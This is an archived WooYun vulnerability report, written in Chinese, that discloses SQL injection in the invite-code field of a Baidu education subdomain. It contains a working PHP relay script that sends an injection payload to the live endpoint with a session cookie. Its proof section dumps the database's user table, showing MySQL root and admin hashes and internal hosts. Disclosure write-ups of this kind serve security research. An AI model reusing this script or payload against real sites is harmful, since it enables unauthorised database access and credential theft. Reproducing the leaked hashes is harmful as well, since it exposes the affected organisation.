百度某二级域名root权限注入 | wooyun-2015-0105423| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0105423

漏洞标题：百度某二级域名root权限注入

漏洞作者：杀器王子

提交时间：2015-04-02 16:49

修复时间：2015-05-18 15:14

公开时间：2015-05-18 15:14

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-04-02：细节已通知厂商并且等待厂商处理中
2015-04-03：厂商已经确认，细节仅向厂商公开
2015-04-13：细节向核心白帽子及相关领域专家公开
2015-04-23：细节向普通白帽子公开
2015-05-03：细节向实习白帽子公开
2015-05-18：细节向公众公开

简要描述：

百度某二级域名root权限注入

详细说明：

https://jpaas-edu.baidu.com/
这个站
填写邀请码的地方存在注入
虽然有验证码但是一个session内不刷新验证码不过期
中转脚本：

<?php
$querystring = "https://jpaas-edu.baidu.com/xplatfe/invite/api_use_invite_code?invite_code=123' or 1=(1=".$_GET['sql'].") limit 1--+&verify=7kpc";  
$cookie_jar='Cookie: sessionid=xxxxxxx'; 
$querystring=str_replace(' ', '%20', $querystring);
//print $querystring;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $querystring);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_COOKIE, $cookie_jar);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$result=curl_exec($ch);
curl_close($ch);
print $result;
?>

漏洞证明：

Database: mysql
Table: user
[6 entries]
+--------------+--------+-------------------------------------------+
| Host         | User   | Password                                  |
+--------------+--------+-------------------------------------------+
| 10.50.139.13 | root   | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
| 10.50.141.55 | edu_rd | *5A0E47C6BA3A218EC7B929CEB437E60772DD89E1 |
| 127.0.0.1    | admin  | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
| 127.0.0.1    | root   | *62F991AB07B10BD7A6C95A83E991CB912A136690 |
| localhost    | admin  | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
| localhost    | root   | *62F991AB07B10BD7A6C95A83E991CB912A136690 |
+--------------+--------+-------------------------------------------+

available databases [6]:
[*] baidu_dba
[*] edu
[*] edu2
[*] information_schema
[*] mysql
[*] test

修复方案：

修复注入

版权声明：转载请注明来源杀器王子@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2015-04-03 15:12

厂商回复：

感谢提交，已通知业务部门处理

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0105423

漏洞标题：百度某二级域名root权限注入

相关厂商：百度

漏洞作者：杀器王子

提交时间：2015-04-02 16:49

修复时间：2015-05-18 15:14

公开时间：2015-05-18 15:14

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源杀器王子@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0105423

漏洞标题：百度某二级域名root权限注入

相关厂商：百度

漏洞作者： 杀器王子

提交时间：2015-04-02 16:49

修复时间：2015-05-18 15:14

公开时间：2015-05-18 15:14

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0105423"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 杀器王子@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：杀器王子

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源杀器王子@乌云